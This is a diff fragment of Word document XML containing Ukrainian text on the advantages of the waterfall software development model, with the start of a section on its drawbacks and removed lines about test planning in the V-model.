+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> відстеження проектів, не пов'язаних з розробкою ПЗ);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">вона впорядковано </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>впору</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1359,23 +1491,33 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>подібна</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> модель була с</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>творена з метою допомогти працю</w:t>
+        <w:t>ється</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> зі складнощами і добре спрацьовує </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>для</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> тих проектів, які досить зрозумілі, але все ж важк</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1384,15 +1526,15 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>ючій</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> над проектом команді в </w:t>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1401,7 +1543,563 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>плануванні</w:t>
+        <w:t xml:space="preserve">для </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>розв'яз</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>вона досить доступна дли розумінні, так як переслі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>дується</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> проста мета - виконати. необхідні дії;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>вона проста і зручна до застосування, так як процес розробки виконується поетапно;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">її структурою може керуватися навіть слабо </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідготовлений в технічному плані або недосвідчений персонал;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>вона ві</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>др</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізняється стабільністю требоваінй;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Вона являє собою шаблон, в який можна помістити методи для виконання аналізу, проектування, кодування, тестування і забезпечення;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Вона </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>добре</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> спрацьовує тоді, коли вимоги до якості домінують над вимогами до витрат і графіку виконання проекту;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>вона сприяє здійсненню суворого контролю менеджменту проекту;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">при правильному використанні моделі дефекти можна виявити </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>на б</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ільш ранніх етапах, коли їх усунення ще не вимагає щодо великих витрат;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>вона полегшує роботу менеджеру проекту зі складання плану і комплектації команди розробникі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>вона дозволяє учасникам проекту, що завершив дії на виконуваної ними фазі, взяти участь в реалізації інших проекті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Вона визначає процедури з контролю </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>за</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> якістю. Кожні отримані дані </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>іддаються огляду. Така процедура використовується командою розробникі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для визначення якості системи;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">стадії моделі досить </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>добре</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> визначені і зрозумілі;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>хід виконання проекту легко простежити за допомогою використання тимчасової шкали (або діаграми Гантта), оскільки момент завершення кожної фази використовується в якості стадії.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Недоліки каскадної</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1414,19 +2112,60 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>моделі</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>і</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>з забезпеченням подальшої можливості тестування системи. У цій моделі особливе значення надається діям, спрямованим на верифікацію і атестацію продукту. Вона демонстру</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Але при використанні каскадної моделі для проекту, який важко назвати</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">відповідним для нас, виявляються </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -1435,7 +2174,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>є,</w:t>
+        <w:t>такими</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -1444,25 +2183,24 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> що тестування продукту обговорюється</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve"> недоліки:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> проектує</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1470,51 +2208,466 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>ться</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>-н</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">а фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>пунктирною</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
